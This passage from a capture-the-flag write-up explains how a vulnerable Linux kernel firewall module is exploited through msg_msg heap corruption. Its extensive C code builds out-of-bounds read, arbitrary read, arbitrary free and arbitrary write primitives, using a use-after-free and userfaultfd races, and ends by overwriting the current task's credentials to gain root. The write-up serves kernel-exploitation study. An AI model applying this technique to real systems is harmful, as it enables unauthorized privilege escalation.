        ipc_unlock_object(&msq->q_perm);
        rcu_read_unlock();
        schedule();

        /*
            * Lockless receive, part 1:
            * We don't hold a reference to the queue and getting a
            * reference would defeat the idea of a lockless operation,
            * thus the code relies on rcu to guarantee the existence of
            * msq:
            * Prior to destruction, expunge_all(-EIRDM) changes r_msg.
            * Thus if r_msg is -EAGAIN, then the queue not yet destroyed.
            */
        rcu_read_lock();

        /*
            * Lockless receive, part 2:
            * The work in pipelined_send() and expunge_all():
            * - Set pointer to message
            * - Queue the receiver task for later wakeup
            * - Wake up the process after the lock is dropped.
            *
            * Should the process wake up before this wakeup (due to a
            * signal) it will either see the message and continue ...
            */
        msg = READ_ONCE(msr_d.r_msg);
        if (msg != ERR_PTR(-EAGAIN)) {
            /* see MSG_BARRIER for purpose/pairing */
            smp_acquire__after_ctrl_dep();

            goto out_unlock1;
        }

            /*
            * ... or see -EAGAIN, acquire the lock to check the message
            * again.
            */
        ipc_lock_object(&msq->q_perm);

        msg = READ_ONCE(msr_d.r_msg);
        if (msg != ERR_PTR(-EAGAIN))
            goto out_unlock0;

        list_del(&msr_d.r_list);
        if (signal_pending(current)) {
            msg = ERR_PTR(-ERESTARTNOHAND);
            goto out_unlock0;
        }

        ipc_unlock_object(&msq->q_perm);
    }

out_unlock0:
    ipc_unlock_object(&msq->q_perm);
    wake_up_q(&wake_q);
out_unlock1:
    rcu_read_unlock();
    if (IS_ERR(msg)) {
        free_copy(copy);
        return PTR_ERR(msg);
    }

    bufsz = msg_handler(buf, msg, bufsz); // [2]
    free_msg(msg); // [3]

    return bufsz;
}

As we can see, in do_msgrcv() the kernel uses find_msg() to locate the correct message [1], then, on success, after performing some checks and unlinking the requested message from the message queue, it calls msg_handler(), previously set to do_msg_fill() to copy the message from kernel space to user space [2]:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
static long do_msg_fill(void __user *dest, struct msg_msg *msg, size_t bufsz)
{
    struct msgbuf __user *msgp = dest;
    size_t msgsz;

    if (put_user(msg->m_type, &msgp->mtype))
        return -EFAULT;

    msgsz = (bufsz > msg->m_ts) ? msg->m_ts : bufsz; // [2.1]
    if (store_msg(msgp->mtext, msg, msgsz)) // [2.2]
        return -EFAULT;
    return msgsz;
}

do_msg_fill(), checks if the requested message size is greater than the size saved in msg->m_ts [2.1]. If the requested size exceeds the size saved in the message header, it will only copy m_ts bytes, otherwise it will use the size provided by the user.

This check is necessary to avoid an Out Of Bounds Read when the user calls msgrcv(). In our case, msgsz will be equal to 0x1fc8 bytes.

Finally, store_msg() is called [2.2]. It copies msgsz bytes (0x1fc8 in our case) from kernel space to the buffer provided by the user:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
int store_msg(void __user *dest, struct msg_msg *msg, size_t len)
{
    size_t alen;
    struct msg_msgseg *seg;

    alen = min(len, DATALEN_MSG); // [2.2.1]
    if (copy_to_user(dest, msg + 1, alen)) // [2.2.2]
        return -1;

    for (seg = msg->next; seg != NULL; seg = seg->next) { // [2.2.3]
        len -= alen;
        dest = (char __user *)dest + alen;
        alen = min(len, DATALEN_SEG); // [2.2.4]
        if (copy_to_user(dest, seg + 1, alen)) // [2.2.5]
            return -1;
    }
    return 0;
}

store_msg(), based on the size of alen [2.2.1] (0xfd0 in our case, exactly what we have already seen in load_msg() and alloc_msg()), starts copying the message data to the user space buffer. [2.2.2]. Then it starts traversing the list of segments until there are no more segments left [2.2.3], calculating each time the size of alen [2.2.4] and copying the segment data to user space [2.2.5]. In our case there is only one segment from which to copy 0xff8 bytes.

Once the procedure is completed, as we can see in the do_msgrcv() source code, it calls free_msg() [3] to deallocate the message and its respective segment:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
void free_msg(struct msg_msg *msg)
{
    struct msg_msgseg *seg;

    security_msg_msg_free(msg);

    seg = msg->next;
    kfree(msg);  // [3.1]
    while (seg != NULL) { // [3.2]
        struct msg_msgseg *tmp = seg->next;

        cond_resched();
        kfree(seg); // [3.3]
        seg = tmp;
    }
}

Initially free_msg() uses kfree() to free the message [3.1], then it starts traversing the singly linked list of segments [3.2] to deallocate them [3.3].

Now it is important to note, that if we call msgrcv() with the MSG_COPY flag, for example as follows:

1
2
void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);

the kernel will not destroy the original message.

From the do_msgrcv() source code, we can see that if MSG_COPY is set, it uses prepare_copy() to allocate a temporary message [4], then it calls copy_msg() to copy the content of the requested message (using memcpy()) into the copy, this way, after copying the message to user space, the original message is preserved, and the copy is destroyed by free_msg(). This will be extremely important in the exploitation phase.

It is possible to use the MSG_COPY flag only if the kernel is compiled with CONFIG_CHECKPOINT_RESTORE. This is true by default in many Linux distributions.

The Exploit: Out Of Bounds Read

At this point, after analyzing the code used by the kernel to perform message operations, it is quite clear how the corruption of message metadata can be used to compromise the kernel.

In the next sections, corrupting fields in the msg_msg structure, we will be able to find the address of the current task in memory and override its credentials with zeroes to get root privileges.

How to get arbitrary read by corrupting the m_ts field and the next field of the msg_msg structure has already been shown by the Linux kernel developer and security researcher Alexander Popov in his excellent article Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel.

After reading his article, I wondered what other primitives this elastic object could offer, and after analyzing the source code, I managed to turn it into an exploitation toolkit.

Since the firewall does not offer any function we can exploit to get a leak (remember, show_rule() is exposed but not implemented), we can cause a UAF duplicating a rule and freeing it, then we can allocated messages (because of SLUB LIFO behavior the rule chunk will be reused by one of the messages), and finally we can corrupt its m_ts field using edit_rule(), to get a Out Of Bounds Read primitive when msgrcv() is called:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
[...]

void send_msg(int qid, int size, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

[...]

// [1]
if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
    perror("msgget");
    exit(1);
}

if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
    perror("msgget");
    exit(1);
}

// [2]
add_rule(0, buff, INBOUND);
duplicate_rule(0, INBOUND);
delete_rule(0, INBOUND);

send_msg(qid[0], 0x40, 'A'); // [3]
send_msg(qid[1], 0x40, 'B'); // [4]
send_msg(qid[1], 0x1ff8, 0); // [5]

[...]

First, we create two queues using msgget() [1]. Let’s identify the first queue with QID #0 and the second one with QID #1.

Then we cause a UAF adding a rule in firewall_rules_in, duplicating it in firewall_rule_out, and freeing it in firewall_rules_in. [2] Despite the pointer being set to NULL in firewall_rules_in, it will be still be accessible in firewall_rule_out.

Now we can use send_msg() (a msgsnd() wrapper), to allocate three messages. We allocate a first message of 0x40 bytes (0x30 bytes of header and 0x10 bytes of data) in the first queue QID #0 [3]. Since we just freed the rule, it will be allocated at the same address. Now we have full control over the message header.

PS: It is important to note that this system is virtually noise-free. On a real system, we would need to saturate partial slabs before allocating the firewall rule and instead of allocating three messages, we would need to spray many of them.

Now we allocate two other messages in QID #1, a first message of 0x40 bytes (again, 0x30 bytes of header and 0x10 bytes of data) [4], that will be allocated always in kmalloc-64, and another one of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data) [5].

At this point the situation in memory should be similar to the following diagram. Please note that because of freelist randomization, the first message may be allocated after the second one and our leak attempt may fail. In this case we simply need to delete the second queue and run the exploit again.

debug

In the diagram above, in orange, we can see the message header of the first message in QID #0. We have full control over this object using edit_rule().

Always in kmalloc-64, we can also see the other message, belonging to QID #1. The m_list.prev field of this message, points to its message queue, QID #1, the m_list.next field instead, points to the second message in QID #1, the large message in kmalloc-4k.

This message has a pointer to a segment, always in kmalloc-4k. We are ready to get an information leak triggering a Out Of Bounds Read:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
[...]

void *recv_msg(int qid, size_t size)
{
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) == -1)
    {
        perror("msgrcv");
        return NULL;
    }

    return memdump;
}

[...]

uint64_t *arb_read(int idx, uint64_t target, size_t size, int overwrite)
{
    struct evil_msg *msg = (struct evil_msg *)malloc(0x100);

    msg->m_type =  0;
    msg->m_ts = size; // [2]

    if (overwrite)
    {
        msg->next = target;
        edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0);
    }
    else
    {
        edit_rule(idx, (unsigned char *)msg, OUTBOUND, 1); // [3]
    }

    free(msg);

    return recv_msg(qid[0], size); // [4]
}

[...]

uint64_t *leak = arb_read(0, 0, 0x2000, 0); // [1]

[...]

Using arb_read() [1] with a size argument of 0x2000 bytes, we can overwrite the target object’s m_ts field [2] using edit_rule() [3].

Then, calling recv_msg() (a msgrcv() wrapper) [4], we get an information leak. It is important to note that in recv_msg() we use the MSG_COPY flag: overwriting the target object, we corrupted its m_list.next and m_list.prev fields, therefore if we don’t use MSG_COPY, do_msgrcv() will try to unlink the message from the queue, causing a crash.

debug

As we can see from the figure above, we overwritten the m_ts field in the msg_msg in QID #0, this will give us an Out Of Bounds Read primitive when recv_msg() is called. This way, we can leak the m_list.next field of the message in QID #1 (the address of the large message in kmalloc-4k), the m_list.prev field (the pointer to QID #1), and sysfs_bin_kfops_ro.

PS: sysfs_bin_kfops_ro comes from mounting /sys in the init file. The symbol is there because the system is virtually noise-free: no other objects have been allocated since system startup. On a real system we would need to spray target objects in the slab before attempting to leak. For example, we could spray pipe_buffer structures and then resize pipe rings to allocate them in kmalloc-64.

sysfs_bin_kfops_ro belongs to the kernel data section and it is not affected by FGKASLR, so we can use it to calculate the kernel base address, or to calculate addresses of other symbols in the data section.

The Exploit: From Out Of Bounds Read To Arbitrary Read

In the previous section, among other things, we leaked the address of sysfs_bin_kfops_ro. We can use it to calculate the address of init_task. init_task corresponds to the address of the first process executed by the system. In Linux every task is defined by the structure task_struct. Tasks are linked together in a circular doubly linked list, tasks.

In our discussion we are interested in three fields of task_struct: tasks, the circular doubly linked list of tasks: for each task it contains pointers to the next and previous task. pid, the process identifier, and cred, a structure that contains the process credentials, uid,gid etc.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
[...]

uint64_t find_current_task(uint64_t init_task)
{
    pid_t pid, next_task_pid;
    uint64_t next_task;

    pid = getpid();

    printf("[+] Current task PID: %d\n", pid);
    puts("[*] Traversing tasks...");

    leak = arb_read(0, init_task + 8, 0x1500, 1) + 0x1f9;
    next_task = leak[0x298/8] - 0x298;

    leak = arb_read(0, next_task + 8, 0x1500, 1) + 0x1f9;
    next_task_pid = leak[0x398/8];

    while (next_task_pid != pid) // [2]
    {
        next_task = leak[0x298/8] - 0x298; // [3]
        leak = arb_read(0, next_task + 8, 0x2000, 1) + 0x1f9;
        next_task_pid = leak[0x398/8]; // [4]
    }

    puts("[+] Current task found!");

    return next_task;
}

[...]

puts("[*] Locating current task address...");
uint64_t current_task = find_current_task(init_task); // [1]
printf("[+] Leaked current task address: 0x%lx\n", current_task);

[...]

In the source code above, we use the function find_current_task() [1] to traverse all tasks, starting from init_task until the current task is found [2].

find_current_task() uses arb_read() multiple times, overwriting the m_ts field and the next pointer of the target object msg_msg.

For each task it leaks the pointer to the next task [3] and the task PID [4], then it compares the leaked PID with the current process PID, until there is a match:

debug

In the figure above we can see that now the m_ts field of the target object is set to 0x2000 and its segment pointer, points to init_task.

Now, calling msgrcv(), the kernel will not only copy 0xfd0 bytes from the message, but it will also copy 0xff8 bytes from fake segment: init_task.

Once we found the current task, we can use our arbitrary read primitive to leak the address of its cred structure.

1
2
3
4
5
6
7
[...]

leak = arb_read(0, current_task, 0x2000, 1) + 0x1fa;
cred_struct = leak[0x540/8];
printf("[+] Leaked current task cred struct: 0x%lx\n", cred_struct);

[...]

debug

The Exploit: Arbitrary Free

At this point, we know the address of the current task and its cred structure. Now we need to obtain arbitrary write, but it is not so simple. First we need to get an arbitrary free primitive.

Arbitrary free, can be obtained using msgrcv() (without the MSG_COPY flag) two times:

1
2
3
4
5
6
[...]

msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [1]
msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [2]

[...]

The first time we call msgrcv() [1], the kernel will free the first message (in kmalloc-64) belonging to QID #1. When we call it again [2], the kernel will free the second message (in kmalloc-4k) and its respective segment (in kmalloc-4k), always belonging to QID #1. The result in memory will be the following:

debug

Now, this is a very important step, and can be quite confusing.

In the first part of the exploit, we leaked the address of the message in kmalloc-4k. In the previous step, when we used msgrcv() for the second time, the kernel in free_msg() released the message in kmalloc-4k and then it released its segment.

Because of freelists LIFO behavior, when we allocate a new message and corresponding segment in kmalloc-4k, the new message will be allocated at the address of the old segment and the new segment at the address of the old message.

In other words, when we free and re-allocate message and segment, positions are swapped. Since we previously leaked the address of the message, what we know after re-allocation is the address of the new segment.

Here is a visual representation. We know the address of the green chunk:

debug

Now that we clarified this important point, we can use pthread to allocate a new message and its respective segment in kmalloc-4k:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
[...]

void *allocate_msg1(void *_)
{
    printf("[Thread 1] Message buffer allocated at 0x%lx\n", page_1 + PAGE_SIZE - 0x10);

    if ((qid[2] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
    {
        perror("msgget");
        exit(1);
    }

    memset(page_1, 0, PAGE_SIZE);
    ((unsigned long *)(page_1))[0xff0 / 8] = 1;

    if (msgsnd(qid[2], page_1 + PAGE_SIZE - 0x10, 0x1ff8 - 0x30, 0) < 0) // [3]
    {
        puts("msgsend failed!");
        perror("msgsnd");
        exit(1);
    }

    puts("[Thread 1] Message sent, *next overwritten!");
}

[...]

pthread_create(&tid[2], NULL, allocate_msg1, NULL); // [1]

[...]

We create a new thread that will execute allocate_msg1() [1]. Here, we create a new queue [2], QID #2, then we use msgsnd() [3] to create a message of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data), that in kernel space will result in a 0x1000 bytes message (0x30 bytes of header and 0xfd0 bytes of data), allocated in kmalloc-4k, and a segment of 0x1000 bytes (0x8 bytes for the next pointer and 0xff8 bytes of data) always allocated in kmalloc-4k.

The location page_1 + PAGE_SIZE - 0x10 is not random, we use userfaultfd to monitor the location page_1 + PAGE_SIZE, waiting for a page fault.

When load_msg() will try to copy our message to kernel space, it will cause a page fault. At that point we will be able to suspend the kernel thread during the copy_from_user() operation.

This will result in the following situation in memory:

debug

We can finally use the arbitrary free primitive:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
[...]

void arb_free(int idx, uint64_t target)
{
    struct evil_msg *msg = (struct evil_msg *)malloc(0x100);
    void *memdump = malloc(0x2000);

    msg->m_list.next = queue; // [2]
    msg->m_list.prev = queue;
    msg->m_type =  1;
    msg->m_ts = 0x10;
    msg->next = target; // [3]

    edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0); // [4]

    puts("[*] Triggering arb free...");
    msgrcv(qid[0], memdump, 0x10, 1, IPC_NOWAIT | MSG_NOERROR); // [5]
    puts("[+] Target freed!");

    free(memdump);
    free(msg);
}

[...]

arb_free(0, large_msg); // [1]

[...]

The function arb_free() [1], is used to free the new segment.

We use the message queue leaked in the first part of the exploit, to fix m_list.next and m_list.prev [2], this, will allow us to use msgrcv() without the MSG_COPY flag, and the kernel will not crash during the unlinking procedure.

We also set the message next pointer to the target address [3]: the new segment in kmalloc-4k.

When we overwrite the message [4] the situation in memory will be the following:

debug

Now we can finally use msgrcv() [5] to free the message in QID #0 and the new segment:

debug

The Exploit: From Arbitrary Free To Arbitrary Write

Now the next pointer of our message in kmalloc-4k, points to a free object. We can create a new thread, and allocate another message in that location:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
[...]

void *allocate_msg2(void *_)
{
    printf("[Thread 2] Message buffer allocated at 0x%lx\n", page_2 + PAGE_SIZE - 0x10);

    if ((qid[3] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
    {
        perror("msgget");
        exit(1);
    }

    memset(page_2, 0, PAGE_SIZE);
    ((unsigned long *)(page_2))[0xff0 / 8] = 1;

    if (msgsnd(qid[3], page_2 + PAGE_SIZE - 0x10, 0x1028 - 0x30, 0) < 0) // [3]
    {
        puts("msgsend failed!");
        perror("msgsnd");
        exit(1);
    }

    puts("[Thread 2] Message sent, target overwritten!");
}

[...]

pthread_create(&tid[3], NULL, allocate_msg2, NULL); // [1]

[...]

We create a new thread [1], then in allocate_msg2() we create another queue, QID #3 [2] and we use msgsend() to allocate a 0x1028 bytes message [3] (0x30 bytes of header and 0xff8 of data).

In kernel space this message will result in a 0x1000 bytes message (0x30 bytes of header and 0xfd0 bytes of data), that will be allocated at the same address as the segment we previously freed with the arbitrary free primitive, and a 0x30 bytes segment (0x8 bytes for the next pointer and 0x28 bytes of data) that will be allocated in kmalloc-64.

This time, our buffer is located at page_2 + PAGE_SIZE - 0x10 because we are monitoring page_2 + PAGE_SIZE with another userfaultfd thread, waiting for a page fault.

load_msg() will hit the monitored page, causing the following situation in memory:

debug

We can finally release the first faulting thread, this way we will be able to overwrite the next pointer of the message we have just allocated in kmalloc-4k with the address of the current task’s cred - 0x8 bytes:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
[...]

    if (page_fault_location == page_1 + PAGE_SIZE)
    {
        printf("[PFH 1] Page fault at 0x%lx\n", page_fault_location);
        memset(buff, 0, PAGE_SIZE);

        puts("[PFH 1] Releasing faulting thread");

        struct evil_msg *msg = (struct evil_msg *)(buff + 0x1000 - 0x40);

        msg->m_type =  0x1;
        msg->m_ts = 0x1000;
        msg->next = (uint64_t)(cred_struct - 0x8); // [1]

        ufd_copy.dst = (unsigned long)(page_fault_location);
        ufd_copy.src = (unsigned long)(&buff);
        ufd_copy.len = PAGE_SIZE;
        ufd_copy.mode = 0;
        ufd_copy.copy = 0;

        for (;;)
        {
            if (release_pfh_1)
            {
                if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
                {
                    perror("ioctl(UFFDIO_COPY)");
                    exit(1);
                }

                puts("[PFH 1] Faulting thread released");
                break;
            }
        }
    }

[...]

We are subtracting 8 bytes [1] because we need the first QWORD in the segment to be NULL, otherwise load_msg() will try to access the next segment causing a crash.

Once the first faulting thread is released, this is how the memory will look like:

debug

The next pointer of the message in QID #3 now points to the current task credentials. The last step is predictable, we release the second faulting thread overwriting the credentials with zeroes. This, will give us root privileges:

debug

Here is the exploit in action:

debug

The complete exploit can be found here: exploit.c

Conclusion

The technique described in the previous sections is applicable in multiple caches, starting from kmalloc-64 up to kmalloc-4k. In the specific case of kmalloc-4k, the exploitation turns out to be simpler, to learn more, I recommend you to read the excellent writeup of Fire of Salvation by FizzBuzz101.

It is worth noting that in a less protected environment, such as common Linux distributions (with CONFIG_STATIC_USERMODEHELPER unset, without FGKASLR so on), the technique can be simplified by targeting modrpobe_path, core_pattern etc, instead of targeting the current task’s credentials.

As always, for any question or clarification feel free to contact me (check About).

Challenges links: Fire of Salvation / Wall of Perdition

References

SMAP / SMEP

FGKASLR

NetFilter

CVE-2021-26708 by a13xp0p0v